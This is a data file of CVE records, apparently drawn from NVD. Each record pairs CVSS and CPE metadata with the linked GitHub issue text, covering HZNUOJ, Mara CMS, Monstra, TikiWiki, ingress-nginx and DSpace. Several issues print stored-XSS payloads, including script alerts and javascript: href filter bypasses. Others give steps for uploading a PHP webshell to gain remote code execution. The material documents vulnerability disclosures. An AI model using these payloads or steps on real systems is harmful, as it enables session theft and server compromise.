[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:hznuoj_project:hznuoj:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "D8A15FBC-ADF4-4CD1-9EF9-FC5F7757A08A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/wlx65003/HZNUOJ/issues/17
[ "Exploit", "Third Party Advisory" ]
github.com
[ "wlx65003", "HZNUOJ" ]
## description The code problem occurred in `OJ / admin-tools / cal_scores.php`. The` $ realname` in the output form was obtained from the database. There was no filtering of angle brackets “<>” during registration, which caused the reorganization here. xss injection ![image-20200225160853304](https://tva1.sinaimg.cn/large/0082zybpgy1gc8pnpy9jgj31w60giacx.jpg) ## Attack process ``` First register an account on the /OJ/modifypage.php page,Class is "软工163",Real Name is <details open ontoggle=['yds_is_so_handsome'].find(\u0070rompt)> ``` ![image-20200225162702052](https://tva1.sinaimg.cn/large/0082zybpgy1gc8q6mwyjpj31d00u0qoq.jpg) Then visit `/ OJ / admin-tools / cal_scores.php`, set the classList to soft 软工163, and click submit ![image-20200225162722101](https://tva1.sinaimg.cn/large/0082zybpgy1gc8q6y9epyj318b0u0dlw.jpg) the attack works ![image-20200225162808498](https://tva1.sinaimg.cn/large/0082zybpgy1gc8q7r2u7sj31bi0judj2.jpg) ## poc ``` <details open ontoggle=['yds_is_so_handsome'].find(\u0070rompt)> ```
Strict SQL filtering leads to xss injection vulnerability
https://api.github.com/repos/lixin-wei/HZNUOJ/issues/17/comments
1
2020-02-25T08:32:50Z
2020-03-15T12:08:26Z
https://github.com/lixin-wei/HZNUOJ/issues/17
570,397,160
17
2,719
CVE-2020-25422
2021-10-28T19:15:08.530
A cross site scripting (XSS) vulnerability in menuedit.php of Mara CMS 7.5 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/r0ck3t1973/xss_payload/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/r0ck3t1973/xss_payload/issues/2" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mara_cms_project:mara_cms:7.5:*:*:*:*:*:*:*", "matchCriteriaId": "F7300FC2-5DCB-48EC-A420-B10B6E7FE97B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/r0ck3t1973/xss_payload/issues/2
[ "Exploit", "Third Party Advisory" ]
github.com
[ "r0ck3t1973", "xss_payload" ]
/*Describe the bug*/ An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Edit Menu" feature. To Reproduce /*Steps to reproduce the behavior*/: 1, Login into the panel 2. Go to '/Mara/codebase/menuedit.php' 3. Insert Payload: "><strong><script>alert(document.domain)</script><font color="green" size=14px>Hello world!</font></strong> 4. Click Test: Alert XSS Message 5. Save and go to Admin Panel 6. Alert XSS Message /*Expected behavior*/ The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page /*Screenshots*/ 1. go to '/Mara/codebase/menuedit.php' ![capture](https://user-images.githubusercontent.com/62001260/91827426-08b4a880-ec69-11ea-97ac-2ff94af3479c.PNG) 2. Insert Payload ![insert_payload](https://user-images.githubusercontent.com/62001260/91827499-21bd5980-ec69-11ea-80a8-602734cba99e.PNG) 3. Click Test: Alert XSS Message ![xss_mess](https://user-images.githubusercontent.com/62001260/91827534-2b46c180-ec69-11ea-83d8-796aad080a31.PNG) 4. Save and go to Admin Panel 5. Alert XSS Message ![xss_mess1](https://user-images.githubusercontent.com/62001260/91827580-37328380-ec69-11ea-931f-f548481e9ac1.PNG) /Desktop (please complete the following information):/ OS: Windows Browser: All I Hope you fix it ASAP
Cross Site Script Vulnerability on "Edit Menu" in Mara 7.5
https://api.github.com/repos/r0ck3t1973/xss_payload/issues/2/comments
0
2020-09-01T08:41:16Z
2021-10-18T15:48:33Z
https://github.com/r0ck3t1973/xss_payload/issues/2
689,947,569
2
2,720
CVE-2021-36547
2021-10-28T20:15:07.477
A remote code execution (RCE) vulnerability in the component /codebase/dir.php?type=filenew of Mara v7.5 allows attackers to execute arbitrary commands via a crafted PHP file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/r0ck3t1973/RCE/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/r0ck3t1973/RCE/issues/1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mara_cms_project:mara_cms:7.5:*:*:*:*:*:*:*", "matchCriteriaId": "F7300FC2-5DCB-48EC-A420-B10B6E7FE97B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/r0ck3t1973/RCE/issues/1
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "r0ck3t1973", "RCE" ]
/*Describe the bug*/ An attacker could insert any executable code through php via File to execution command in the server /*To Reproduce*/ 1. Log into the panel. 2. Click "File" >> New (Mara/codebase/dir.php?type=filenew) 3. Click File Upload 4. Insert payload php: r0ck3t-1973.php 5. Save and Exit 6. Go to Mara/img/r0ck3t-1973.php /*Screenhost*/ 1. ![insert_file](https://user-images.githubusercontent.com/62001260/91823897-229fbc80-ec64-11ea-84f4-488cb458123e.PNG) 2. ![upload](https://user-images.githubusercontent.com/62001260/91823908-26334380-ec64-11ea-86d0-bac4fb82f738.PNG) 3. ![rce](https://user-images.githubusercontent.com/62001260/91823946-2fbcab80-ec64-11ea-9c23-577442d11e41.PNG)
Remote Code Execution via File in Mara version 7.5
https://api.github.com/repos/r0ck3t1973/RCE/issues/1/comments
1
2020-09-01T08:04:38Z
2021-11-11T14:11:37Z
https://github.com/r0ck3t1973/RCE/issues/1
689,921,362
1
2,721
CVE-2021-36548
2021-10-28T20:15:07.533
A remote code execution (RCE) vulnerability in the component /admin/index.php?id=themes&action=edit_template&filename=blog of Monstra v3.0.4 allows attackers to execute arbitrary commands via a crafted PHP file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/monstra-cms/monstra/issues/470" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/monstra-cms/monstra/issues/470" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:monstra:monstra:3.0.4:*:*:*:*:*:*:*", "matchCriteriaId": "13838C95-223E-4896-AA83-B437EFD45660", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/monstra-cms/monstra/issues/470
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "monstra-cms", "monstra" ]
Describe the bug An attacker could insert any executable code through php via Theme Blog to execution command in the server To Reproduce 1. Log into the panel. 2. Go to "/monstra-3.0.4/admin/index.php?id=themes&action=edit_template&filename=blog" 3. Click edit Blog 4. Insert payload easy-simple-php-webshell.php 5. Reload page review code excution ![image](https://user-images.githubusercontent.com/62001260/124411327-8314f400-dd76-11eb-9667-ac5dea9560fa.png) ![image](https://user-images.githubusercontent.com/62001260/124411294-71cbe780-dd76-11eb-829b-7cd23ae15560.png)
RCE (Remote Code Execution via Theme Blog Monstra version 3.0.4)
https://api.github.com/repos/monstra-cms/monstra/issues/470/comments
0
2021-07-05T02:51:41Z
2021-10-29T15:41:57Z
https://github.com/monstra-cms/monstra/issues/470
936,628,926
470
2,722
CVE-2021-36550
2021-10-28T20:15:07.580
TikiWiki v21.4 was discovered to contain a cross-site scripting (XSS) vulnerability in the component tiki-browse_categories.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload under the Create category module.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/r0ck3t1973/xss_payload/issues/6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/r0ck3t1973/xss_payload/issues/6" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tiki:tikiwiki_cms\\/groupware:21.4:*:*:*:*:*:*:*", "matchCriteriaId": "0F0B82A2-9FBD-4157-9961-2F3EC8C3F1B1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/r0ck3t1973/xss_payload/issues/6
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "r0ck3t1973", "xss_payload" ]
Hi, I found stored xss in Categories. To Reproduce 1. Login into the panel 2. Go to Documents: 'tiki-21.4/tiki-index.php' 3. Click Categories: '/tiki-21.4/tiki-browse_categories.php' 4. Create category 5. insert payload bypass xss: `<a href="javascript&colon;alert&lpar;1337&rpar;">Click2</a>` 7. Click Categories >> Click2 >> Boom alert message xss! **Impact** Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user’s machine under the guise of the vulnerable site. **POC** ![image_2021-07-07_19-43-05](https://user-images.githubusercontent.com/62001260/124762124-c03adb00-df5c-11eb-8dd1-d58aac88de4b.png) ![image_2021-07-07_19-41-40](https://user-images.githubusercontent.com/62001260/124762142-c6c95280-df5c-11eb-88fa-98d08bccba77.png) ![image_2021-07-07_19-40-58](https://user-images.githubusercontent.com/62001260/124762145-c761e900-df5c-11eb-9437-8f9ad229a8f5.png)
Bypass Cross Site Script Vulnerability on "Categories" in TikiWiki version 21.4
https://api.github.com/repos/r0ck3t1973/xss_payload/issues/6/comments
0
2021-07-07T12:52:26Z
2021-07-07T12:54:28Z
https://github.com/r0ck3t1973/xss_payload/issues/6
938,860,743
6
2,723
CVE-2021-36551
2021-10-28T20:15:07.627
TikiWiki v21.4 was discovered to contain a cross-site scripting (XSS) vulnerability in the component tiki-calendar.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload under the Add Event module.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/r0ck3t1973/xss_payload/issues/7" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/r0ck3t1973/xss_payload/issues/7" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tiki:tikiwiki_cms\\/groupware:21.4:*:*:*:*:*:*:*", "matchCriteriaId": "0F0B82A2-9FBD-4157-9961-2F3EC8C3F1B1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/r0ck3t1973/xss_payload/issues/7
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "r0ck3t1973", "xss_payload" ]
Hi Team, I found stored xss in Calendar To Reproduce 1. Login into panel 2. Go to Documents: '/tiki-21.4/tiki-index.php' 3. Click Calendar: '/tiki-21.4/tiki-calendar.php' 4. Click Add Event 5. insert payload bypass xss in Description `<a href="javascript&colon;alert&lpar;document&period;domain&rpar;">Click Here</a>` 7. Click Details Event >> ClickHere>> Boom alert message xss! **Impact** Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user’s machine under the guise of the vulnerable site. **POC** ![calendar1](https://user-images.githubusercontent.com/62001260/124762346-fe37ff00-df5c-11eb-9663-22b1ce7c30d5.PNG) ![calendar](https://user-images.githubusercontent.com/62001260/124762353-0001c280-df5d-11eb-8273-53699ad295f9.PNG) ![image_2021-07-07_19-43-05](https://user-images.githubusercontent.com/62001260/124762356-009a5900-df5d-11eb-92a4-1c7f436b2ce8.png)
Bypass Cross Site Script Vulnerability on "Calendar" in TikiWiki version 21.4
https://api.github.com/repos/r0ck3t1973/xss_payload/issues/7/comments
0
2021-07-07T12:53:38Z
2021-07-07T12:53:38Z
https://github.com/r0ck3t1973/xss_payload/issues/7
938,861,903
7
2,724
CVE-2021-25742
2021-10-29T04:15:08.220
A security issue was discovered in ingress-nginx where a user that can create or update ingress objects can use the custom snippets feature to obtain all secrets in the cluster.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 5.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.6, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 4.7, "source": "jordan@liggitt.net", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 4.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "jordan@liggitt.net", "tags": [ "Exploit", "Issue Tracking", "Mitigation", "Third Party Advisory" ], "url": "https://github.com/kubernetes/ingress-nginx/issues/7837" }, { "source": "jordan@liggitt.net", "tags": [ "Mailing List", "Mitigation", "Third Party Advisory" ], "url": "https://groups.google.com/g/kubernetes-security-announce/c/mT4JJxi9tQY" }, { "source": "jordan@liggitt.net", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20211203-0001/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Mitigation", "Third Party Advisory" ], "url": "https://github.com/kubernetes/ingress-nginx/issues/7837" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Mitigation", "Third Party Advisory" ], "url": "https://groups.google.com/g/kubernetes-security-announce/c/mT4JJxi9tQY" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20211203-0001/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:ingress-nginx:*:*:*:*:*:*:*:*", "matchCriteriaId": "CEC0CA26-0429-4DD1-904B-5C7637C42704", "versionEndExcluding": "0.49.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:ingress-nginx:1.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "8DA09AFA-48CD-4A55-9C15-A96249C704D0", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netapp:trident:-:*:*:*:*:*:*:*", "matchCriteriaId": "5D9A34F5-AC03-4098-A37D-AD50727DDB11", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "20" ]
20
https://github.com/kubernetes/ingress-nginx/issues/7837
[ "Exploit", "Issue Tracking", "Mitigation", "Third Party Advisory" ]
github.com
[ "kubernetes", "ingress-nginx" ]
### Issue Details A security issue was discovered in ingress-nginx where a user that can create or update ingress objects can use the custom snippets feature to obtain all secrets in the cluster. This issue has been rated **High** ([CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L)), and assigned **CVE-2021-25742**. ### Affected Components and Configurations This bug affects ingress-nginx. Multitenant environments where non-admin users have permissions to create Ingress objects are most affected by this issue. #### Affected Versions with no mitigation - v1.0.0 - <= v0.49.0 #### Versions allowing mitigation This issue cannot be fixed solely by upgrading ingress-nginx. It can be mitigated in the following versions: - v1.0.1 - v0.49.1 ### Mitigation To mitigate this vulnerability: 1. Upgrade to a version that allows mitigation, (>= v0.49.1 or >= v1.0.1) 2. Set [allow-snippet-annotations](https://kubernetes.github.io/ingress-nginx/user-guide/nginx-configuration/configmap/#allow-snippet-annotations) to false in your ingress-nginx ConfigMap based on how you deploy ingress-nginx: **Static Deploy Files** Edit the ConfigMap for ingress-nginx **after** deployment: ``` kubectl edit configmap -n ingress-nginx ingress-nginx-controller ``` Add directive: ```` data: allow-snippet-annotations: “false” ```` More information on the ConfigMap [here](https://kubernetes.github.io/ingress-nginx/user-guide/nginx-configuration/configmap/) **Deploying Via Helm** Set `controller.allowSnippetAnnotations` to `false` in the Values.yaml or add the directive to the helm deploy: ``` helm install [RELEASE_NAME] --set controller.allowSnippetAnnotations=false ingress-nginx/ingress-nginx ```` [https://github.com/kubernetes/ingress-nginx/blob/controller-v1.0.1/charts/ingress-nginx/values.yaml#L76](https://github.com/kubernetes/ingress-nginx/blob/controller-v1.0.1/charts/ingress-nginx/values.yaml#L76) ### Detection If you find evidence that this vulnerability has been exploited, please contact security@kubernetes.io Additional Details See ingress-nginx Issue kubernetes/kubernetes#126811 for more details. ### Acknowledgements This vulnerability was reported by Mitch Hulscher. Thank You, CJ Cullen on behalf of the Kubernetes Security Response Committee
CVE-2021-25742: Ingress-nginx custom snippets allows retrieval of ingress-nginx serviceaccount token and secrets across all namespaces
https://api.github.com/repos/kubernetes/kubernetes/issues/126811/comments
63
2021-10-21T16:08:21Z
2024-08-20T13:17:02Z
https://github.com/kubernetes/kubernetes/issues/126811
2,475,614,887
126,811
2,725
CVE-2021-41189
2021-10-29T18:15:08.167
DSpace is an open source turnkey repository application. In version 7.0, any community or collection administrator can escalate their permission up to become system administrator. This vulnerability only exists in 7.0 and does not impact 6.x or below. This issue is patched in version 7.1. As a workaround, users of 7.0 may temporarily disable the ability for community or collection administrators to manage permissions or workflows settings.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "COMPLETE", "baseScore": 9, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 10, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 5.9, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/DSpace/DSpace/commit/277b499a5cd3a4f5eb2370513a1b7e4ec2a6e041" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/DSpace/DSpace/commit/c3bea16ab911606e15ae96c97a1575e1ffb14f8a" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/DSpace/DSpace/issues/7928" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/DSpace/DSpace/security/advisories/GHSA-cf2j-vf36-c6w8" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/DSpace/DSpace/commit/277b499a5cd3a4f5eb2370513a1b7e4ec2a6e041" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/DSpace/DSpace/commit/c3bea16ab911606e15ae96c97a1575e1ffb14f8a" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/DSpace/DSpace/issues/7928" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/DSpace/DSpace/security/advisories/GHSA-cf2j-vf36-c6w8" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:duraspace:dspace:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "EC2273B4-D6B6-4968-BF9A-65812B5799A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "863" ]
863
https://github.com/DSpace/DSpace/issues/7928
[ "Exploit", "Third Party Advisory" ]
github.com
[ "DSpace", "DSpace" ]
**Describe the bug** The "Anonymous" group has the "Articles" collection as linked object: [https://api7.dspace.org/server/api/eperson/groups/f2c7eb75-aec0-4604-ab7f-6676723818ad/object](https://api7.dspace.org/server/api/eperson/groups/f2c7eb75-aec0-4604-ab7f-6676723818ad/object) This is not true, as it's not a `COLLECTION_[uuid]_*` group. ![bug](https://user-images.githubusercontent.com/87638927/131855577-2efe384a-e159-4d0e-a457-18ed872adbdb.png) **Related work** https://github.com/DSpace/dspace-angular/pull/1298
REST service returns wrong object for the "Anonymous" group
https://api.github.com/repos/DSpace/DSpace/issues/7928/comments
2
2021-09-02T14:01:40Z
2021-10-26T16:39:32Z
https://github.com/DSpace/DSpace/issues/7928
986,773,109
7,928
2,726
CVE-2020-25872
2021-10-29T20:15:07.747
